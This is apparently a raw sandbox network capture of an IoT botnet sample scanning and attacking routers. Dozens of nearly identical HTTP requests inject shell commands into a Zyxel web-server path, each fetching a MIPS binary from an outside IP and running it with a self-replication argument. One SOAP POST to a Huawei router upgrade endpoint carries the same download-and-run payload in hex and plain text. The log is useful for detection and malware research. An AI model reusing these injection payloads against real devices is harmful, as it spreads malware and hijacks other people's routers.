                                                        Feb 2, 2024 06:21:08.908641100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4232192.168.2.145399479.48.30.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908674955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4233192.168.2.1457398175.65.249.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908706903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4234192.168.2.144675886.164.53.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908766985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4235192.168.2.1457068221.189.55.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908814907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4236192.168.2.1452524118.185.39.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908853054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4237192.168.2.1453772186.91.63.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908890963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4238192.168.2.1453184117.193.192.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908936977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4239192.168.2.143445246.212.129.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908960104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4240192.168.2.1458510211.222.207.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908989906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4241192.168.2.143468219.135.142.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.909018993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4242192.168.2.1449788152.106.238.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.909051895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4243192.168.2.144161479.11.233.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.909082890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4244192.168.2.1453636117.15.239.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.909132957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4245192.168.2.1453790170.226.229.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.909181118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4246192.168.2.144287860.176.149.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.909231901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4247192.168.2.1440342184.178.79.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.909276009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4248192.168.2.1440932148.203.215.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.909317017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4249192.168.2.144819034.120.204.24337215
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.755726099 CET841OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 472
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4250192.168.2.1448524103.67.108.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.919842005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4251192.168.2.143997231.99.210.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.919888973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4252192.168.2.145191019.47.224.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.919931889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4253192.168.2.1437456126.165.65.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.919997931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4254192.168.2.1449412163.252.110.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920056105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4255192.168.2.145677643.220.196.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920082092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4256192.168.2.145125631.120.180.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920137882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4257192.168.2.144775035.98.10.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920176983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4258192.168.2.1442746104.243.224.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920216084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4259192.168.2.1442628180.100.233.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920269012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4260192.168.2.1444646146.250.29.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920319080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4261192.168.2.144781089.129.2.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920356989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4262192.168.2.1457502162.53.71.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920396090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4263192.168.2.1442720211.111.116.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920418978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4264192.168.2.1434698191.248.188.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920476913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4265192.168.2.145373863.188.161.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920531988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4266192.168.2.145679279.206.55.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920563936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4267192.168.2.143850889.250.19.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920578957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4268192.168.2.143677868.149.71.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920615911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4269192.168.2.1448852105.144.229.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920664072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4270192.168.2.143754019.151.42.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920696020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4271192.168.2.1457422191.155.129.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920739889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4272192.168.2.146048659.240.185.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920775890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4273192.168.2.1458132217.173.145.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920825005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4274192.168.2.1440186222.122.187.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920862913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4275192.168.2.145926027.44.116.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920897961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4276192.168.2.1454440171.231.186.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920932055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4277192.168.2.144328434.151.34.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.920977116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4278192.168.2.144371097.89.62.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921019077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4279192.168.2.1442676101.143.65.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921067953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4280192.168.2.1442362219.151.86.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921102047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4281192.168.2.1434380210.234.223.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921143055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4282192.168.2.144615652.62.128.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921181917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4283192.168.2.143728882.145.98.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921243906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4284192.168.2.1458298129.168.49.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921289921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4285192.168.2.145905263.103.175.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921343088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4286192.168.2.1455520156.189.203.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921372890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4287192.168.2.143943838.73.155.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.921408892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
